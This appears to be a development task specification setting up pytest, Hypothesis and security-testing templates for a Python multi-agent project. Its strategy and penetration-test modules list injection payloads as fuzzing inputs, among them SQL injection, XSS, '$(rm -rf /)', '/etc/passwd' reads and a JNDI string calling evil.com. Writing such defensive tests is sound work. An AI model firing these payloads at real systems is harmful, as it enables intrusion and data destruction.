# TASK_13: Testing Infrastructure & Framework Setup
**Created By**: Adder_1 | **Priority**: HIGH | **Duration**: 4 hours
**Technique Focus**: All ADDER+ techniques + Property-based testing + Security testing
**Size Constraint**: Target <200 lines/module, Max 300 if splitting awkward
## π¦ Status & Assignment
**Status**: COMPLETE
**Assigned**: Adder_1
**Dependencies**: None (Parallel infrastructure task)
**Blocking**: All future testing (enables TASK_1-12 validation)
## π Required Reading (Complete before starting)
- [x] **Testing Strategy**: `tests/TESTING.md` - Current test status and planned framework
- [x] **Architecture**: `ARCHITECTURE.md` - System components requiring testing
- [x] **FastMCP Protocol**: `development/protocols/FASTMCP_PYTHON_PROTOCOL.md` - Integration patterns
- [ ] **Security Contracts**: Understanding security testing requirements
## π― Objective & Context
**Goal**: Establish comprehensive testing infrastructure with property-based testing, security validation, and CI/CD pipeline
**Context**: Foundation for all future development validation - enables immediate testing of TASK_1-12 deliverables
<thinking>
Testing Infrastructure Analysis:
1. Current state: 0 tests, no framework setup
2. Need comprehensive testing strategy covering all ADDER+ techniques
3. Property-based testing with Hypothesis for edge case discovery
4. Security testing framework for penetration testing
5. Performance benchmarking for concurrent agent operations
6. Mock infrastructure for iTerm2 and Claude Code dependencies
7. CI/CD integration for automated testing
8. Test data management and fixtures
</thinking>
## β
Implementation Subtasks (Sequential completion)
### Phase 1: Core Testing Framework Setup
- [x] **Subtask 1.1**: Configure pytest with asyncio, coverage, and parallel execution
- [x] **Subtask 1.2**: Install and configure Hypothesis for property-based testing
- [x] **Subtask 1.3**: Setup security testing tools (bandit, safety, pytest-security)
- [x] **Subtask 1.4**: Configure performance benchmarking with pytest-benchmark
### Phase 2: Mock Infrastructure & Fixtures
- [x] **Subtask 2.1**: Create comprehensive test fixtures for all domain types
- [x] **Subtask 2.2**: Implement mock iTerm2 manager for isolated testing
- [x] **Subtask 2.3**: Create mock Claude Code integration for unit testing
- [x] **Subtask 2.4**: Setup temporary filesystem and session mocking
### Phase 3: Property-Based Testing Foundation
- [x] **Subtask 3.1**: Define Hypothesis strategies for all domain types
- [x] **Subtask 3.2**: Create property-based test templates for security validation
- [x] **Subtask 3.3**: Implement concurrent operation testing framework
- [x] **Subtask 3.4**: Add input fuzzing and edge case generation
### Phase 4: CI/CD Integration & Documentation
- [x] **Subtask 4.1**: Create GitHub Actions workflow for automated testing
- [x] **Subtask 4.2**: Setup coverage reporting and quality gates
- [x] **Subtask 4.3**: Add security scanning and vulnerability detection
- [x] **Subtask 4.4**: Create comprehensive testing documentation and guidelines
## π§ Implementation Files & Specifications
**Files to Create/Modify**:
- `tests/conftest.py` - Global pytest configuration and fixtures (Target: <200 lines)
- `tests/fixtures/domain.py` - Domain-specific test fixtures (Target: <250 lines)
- `tests/mocks/iterm_manager.py` - iTerm2 manager mocking infrastructure (Target: <200 lines)
- `tests/mocks/claude_code.py` - Claude Code integration mocking (Target: <150 lines)
- `tests/strategies/hypothesis_strategies.py` - Hypothesis strategies for all types (Target: <200 lines)
- `tests/properties/base_properties.py` - Base property-based test templates (Target: <200 lines)
- `tests/security/penetration_tests.py` - Security testing framework (Target: <250 lines)
- `tests/performance/benchmarks.py` - Performance benchmark suite (Target: <200 lines)
- `.github/workflows/test.yml` - CI/CD pipeline configuration
- `pyproject.toml` - Updated with test configuration
- `tests/README.md` - Comprehensive testing documentation
**Key Requirements**:
- Pytest with asyncio support for async/await testing
- Hypothesis for property-based testing with security focus
- Mock infrastructure that doesn't require iTerm2 or Claude Code
- Performance benchmarking for concurrency and resource usage
- Security testing with input fuzzing and penetration testing
- CI/CD integration with quality gates and coverage reporting
## ποΈ Modularity Strategy
**Size Management**:
- Separate testing concerns into focused modules (mocks, fixtures, strategies)
- Use composition for complex test scenarios
- Break property-based tests into reusable templates
- Keep individual test files focused and maintainable
**Organization Principles**:
- Single responsibility per testing module
- Clear separation between unit, integration, and property-based tests
- Minimal coupling between test components
- Maximum reusability of fixtures and mocking infrastructure
## β
Success Criteria & Verification
**Completion Requirements**:
- [ ] Complete pytest framework with asyncio and coverage support
- [ ] Hypothesis property-based testing framework operational
- [ ] Comprehensive mock infrastructure for external dependencies
- [ ] Security testing framework with input fuzzing capabilities
- [ ] Performance benchmarking suite for critical operations
- [ ] CI/CD pipeline with automated testing and quality gates
- [ ] Complete testing documentation and guidelines
- [ ] Example tests demonstrating all testing capabilities
**Quality Gates**:
- Framework: pytest executes successfully with 0 tests initially
- Mocking: Mock infrastructure works without external dependencies
- Properties: Hypothesis generates valid test cases for all domain types
- Security: Security testing framework detects vulnerabilities
- Performance: Benchmark suite measures critical operation performance
- CI/CD: Automated pipeline runs successfully on code changes
## π Handoff Information
**Next Task Dependencies**: All TASK_1-12 will use this testing infrastructure
**Integration Points**: Testing framework supports all system components
**Future Considerations**: Framework extensible for additional testing needs
## π Implementation Templates
### **Global Test Configuration**
```python
# tests/conftest.py
import pytest
import asyncio
from pathlib import Path
from typing import AsyncGenerator, Generator
from unittest.mock import AsyncMock, MagicMock
from tests.mocks.iterm_manager import MockiTermManager
from tests.mocks.claude_code import MockClaudeCodeManager
from tests.fixtures.domain import * # Import all domain fixtures
# Pytest configuration
pytest_plugins = ["pytest_asyncio"]
@pytest.fixture(scope="session")
def event_loop():
"""Create an instance of the default event loop for the test session."""
loop = asyncio.get_event_loop_policy().new_event_loop()
yield loop
loop.close()
@pytest.fixture
async def mock_iterm_manager() -> AsyncGenerator[MockiTermManager, None]:
"""Provide mock iTerm2 manager for testing without iTerm2 dependency."""
manager = MockiTermManager()
await manager.initialize()
try:
yield manager
finally:
await manager.cleanup()
@pytest.fixture
async def mock_claude_manager() -> AsyncGenerator[MockClaudeCodeManager, None]:
"""Provide mock Claude Code manager for testing without Claude Code dependency."""
manager = MockClaudeCodeManager()
await manager.initialize()
try:
yield manager
finally:
await manager.cleanup()
@pytest.fixture
def temp_session_root(tmp_path: Path) -> Path:
"""Provide temporary directory for session testing."""
session_dir = tmp_path / "test_session"
session_dir.mkdir()
# Create basic session structure
(session_dir / ".claude_session").mkdir()
(session_dir / "development").mkdir()
(session_dir / "development" / "tasks").mkdir()
return session_dir
@pytest.fixture
def sample_todo_content() -> str:
"""Provide sample TODO.md content for testing."""
return '''# Project Task Management Dashboard
**Project**: Test Project
**Last Updated**: 2025-06-26 by Adder_1
## Current Assignments
| Task | Status | Agent | Priority | Dependencies |
|------|--------|-------|----------|--------------|
| TASK_1 | IN_PROGRESS | Adder_3 | HIGH | None |
| TASK_2 | IN_PROGRESS | Adder_4 | HIGH | None |
'''
```
### **Hypothesis Strategies**
```python
# tests/strategies/hypothesis_strategies.py
from hypothesis import strategies as st
from typing import NewType
import string
import re
# Basic type strategies
AgentId = NewType('AgentId', str)
SessionId = NewType('SessionId', str)
# Agent name strategy (Agent_#)
agent_name_strategy = st.builds(
lambda n: f"Agent_{n}",
st.integers(min_value=1, max_value=999)
)
# Valid session ID strategy
session_id_strategy = st.builds(
lambda prefix, uuid_part: f"{prefix}_{uuid_part}",
st.sampled_from(["session", "dev", "prod"]),
st.text(
alphabet=string.ascii_lowercase + string.digits,
min_size=8,
max_size=16
)
)
# File path strategies
safe_filename_strategy = st.text(
alphabet=string.ascii_letters + string.digits + "_-.",
min_size=1,
max_size=50
).filter(lambda x: not x.startswith('.') and x != '..' and x != '.')
relative_path_strategy = st.builds(
lambda parts: "/".join(parts),
st.lists(safe_filename_strategy, min_size=1, max_size=5)
)
# Security-focused strategies
malicious_input_strategy = st.one_of([
st.text(min_size=1, max_size=1000), # General text
st.sampled_from([ # Common injection patterns
"'; DROP TABLE agents; --",
"<script>alert('xss')</script>",
"../../../etc/passwd",
"$(rm -rf /)",
"'; cat /etc/passwd; echo '",
"\\x00\\x00\\x00\\x00",
"' OR '1'='1",
"${jndi:ldap://evil.com/a}"
]),
st.binary(min_size=1, max_size=100).map(lambda x: x.decode('utf-8', errors='ignore'))
])
# Agent configuration strategies
agent_config_strategy = st.builds(
dict,
model=st.sampled_from(["sonnet-3.5", "opus-3", "haiku-3"]),
no_color=st.booleans(),
verbose=st.booleans(),
memory_limit=st.integers(min_value=128, max_value=2048)
)
def create_property_test_strategy(type_class):
"""Create a Hypothesis strategy for testing type validation properties."""
if hasattr(type_class, '__annotations__'):
field_strategies = {}
for field_name, field_type in type_class.__annotations__.items():
if field_type == str:
field_strategies[field_name] = st.text(min_size=0, max_size=100)
elif field_type == int:
field_strategies[field_name] = st.integers()
elif field_type == bool:
field_strategies[field_name] = st.booleans()
# Add more type mappings as needed
return st.builds(type_class, **field_strategies)
else:
return st.none()
```
### **Property-Based Test Templates**
```python
# tests/properties/base_properties.py
from hypothesis import given, strategies as st, assume
import pytest
from typing import Any, Callable, TypeVar
T = TypeVar('T')
def test_serialization_roundtrip_property(
serialize_func: Callable[[T], str],
deserialize_func: Callable[[str], T],
strategy: st.SearchStrategy[T]
):
"""Property: Serialization and deserialization should be roundtrip safe."""
@given(data=strategy)
def roundtrip_test(data: T):
serialized = serialize_func(data)
deserialized = deserialize_func(serialized)
assert deserialized == data
return roundtrip_test
def test_input_validation_property(
validation_func: Callable[[Any], bool],
valid_strategy: st.SearchStrategy[Any],
invalid_strategy: st.SearchStrategy[Any]
):
"""Property: Input validation should accept valid inputs and reject invalid ones."""
@given(valid_input=valid_strategy)
def valid_inputs_accepted(valid_input):
assert validation_func(valid_input) == True
@given(invalid_input=invalid_strategy)
def invalid_inputs_rejected(invalid_input):
assume(invalid_input is not None) # Avoid None edge case
assert validation_func(invalid_input) == False
return valid_inputs_accepted, invalid_inputs_rejected
def test_security_boundary_property(
boundary_func: Callable[[Any], bool],
malicious_strategy: st.SearchStrategy[Any]
):
"""Property: Security boundaries should never be bypassed by malicious input."""
@given(malicious_input=malicious_strategy)
def security_boundary_holds(malicious_input):
try:
result = boundary_func(malicious_input)
# If no exception, result should indicate rejection
assert result == False or result is None
except (ValueError, SecurityError, ValidationError):
# Security exceptions are expected and acceptable
pass
except Exception as e:
# Unexpected exceptions indicate potential security issues
pytest.fail(f"Unexpected exception: {type(e).__name__}: {e}")
return security_boundary_holds
class PropertyTestBase:
"""Base class for property-based testing with common patterns."""
@staticmethod
def assert_immutability(obj: Any, operation: Callable[[Any], Any]):
"""Assert that an operation doesn't modify the original object."""
original_state = repr(obj) # Capture state
operation(obj)
new_state = repr(obj)
assert original_state == new_state, "Object was unexpectedly modified"
@staticmethod
def assert_idempotent(operation: Callable[[T], T], input_val: T):
"""Assert that an operation is idempotent (f(f(x)) == f(x))."""
result1 = operation(input_val)
result2 = operation(result1)
assert result1 == result2, "Operation is not idempotent"
@staticmethod
def assert_commutative(operation: Callable[[T, T], T], a: T, b: T):
"""Assert that an operation is commutative (f(a,b) == f(b,a))."""
result1 = operation(a, b)
result2 = operation(b, a)
assert result1 == result2, "Operation is not commutative"
```
### **Security Testing Framework**
```python
# tests/security/penetration_tests.py
import pytest
from hypothesis import given, strategies as st
from typing import Any, List, Dict
import asyncio
from tests.strategies.hypothesis_strategies import malicious_input_strategy
class SecurityTestFramework:
"""Comprehensive security testing framework for penetration testing."""
@staticmethod
async def test_input_injection_resistance(
input_handler: Callable[[str], Any],
malicious_inputs: List[str] = None
):
"""Test resistance to various injection attacks."""
default_malicious_inputs = [
"'; DROP TABLE agents; --", # SQL injection
"<script>alert('xss')</script>", # XSS
"../../../etc/passwd", # Path traversal
"$(rm -rf /)", # Command injection
"'; cat /etc/passwd; echo '", # Command chaining
"\\x00\\x00\\x00\\x00", # Null byte injection
"' OR '1'='1", # Authentication bypass
"${jndi:ldap://evil.com/a}", # Log4j-style injection
"{{7*7}}", # Template injection
"javascript:alert('xss')", # JavaScript protocol
]
test_inputs = malicious_inputs or default_malicious_inputs
for malicious_input in test_inputs:
try:
result = await input_handler(malicious_input)
# If no exception, result should be safely handled
assert not _contains_unescaped_content(result, malicious_input)
except (ValueError, SecurityError, ValidationError):
# Expected security exceptions are acceptable
pass
except Exception as e:
pytest.fail(f"Unexpected exception for input '{malicious_input}': {e}")
@staticmethod
@given(malicious_input=malicious_input_strategy)
def test_boundary_enforcement_property(
boundary_validator: Callable[[str], bool],
malicious_input: str
):
"""Property-based test for security boundary enforcement."""
try:
is_valid = boundary_validator(malicious_input)
# Malicious inputs should be rejected
assert not is_valid, f"Malicious input was accepted: {malicious_input[:50]}"
except (SecurityError, ValidationError):
# Security exceptions are expected
pass
@staticmethod
async def test_privilege_escalation_resistance(
privileged_operation: Callable[..., Any],
unprivileged_context: Dict[str, Any]
):
"""Test resistance to privilege escalation attempts."""
try:
result = await privileged_operation(**unprivileged_context)
# Should either fail or return limited result
assert _is_safe_result(result), "Privileged operation succeeded without proper authorization"
except (PermissionError, SecurityError, AuthenticationError):
# Expected security exceptions
pass
@staticmethod
async def test_resource_exhaustion_resistance(
resource_operation: Callable[..., Any],
excessive_parameters: Dict[str, Any]
):
"""Test resistance to resource exhaustion attacks."""
import time
start_time = time.time()
try:
result = await asyncio.wait_for(
resource_operation(**excessive_parameters),
timeout=10.0 # 10 second timeout
)
elapsed = time.time() - start_time
# Operation should complete quickly or be properly limited
assert elapsed < 5.0, f"Operation took too long: {elapsed}s"
assert _is_reasonable_resource_usage(result), "Excessive resource usage detected"
except (asyncio.TimeoutError, ResourceLimitError):
# Expected timeout or resource limit exceptions
pass
def _contains_unescaped_content(result: Any, malicious_input: str) -> bool:
"""Check if result contains unescaped malicious content."""
if isinstance(result, str):
return malicious_input in result
elif isinstance(result, dict):
return any(malicious_input in str(v) for v in result.values())
return False
def _is_safe_result(result: Any) -> bool:
"""Check if result is safe (limited/filtered)."""
if result is None:
return True
if isinstance(result, dict) and result.get('error'):
return True
if isinstance(result, str) and len(result) < 1000:
return True
return False
def _is_reasonable_resource_usage(result: Any) -> bool:
"""Check if result indicates reasonable resource usage."""
if isinstance(result, dict):
size = result.get('size', 0)
return size < 10_000_000 # 10MB limit
return True
```
This testing infrastructure provides comprehensive coverage for all ADDER+ techniques with property-based testing, security validation, and CI/CD integration.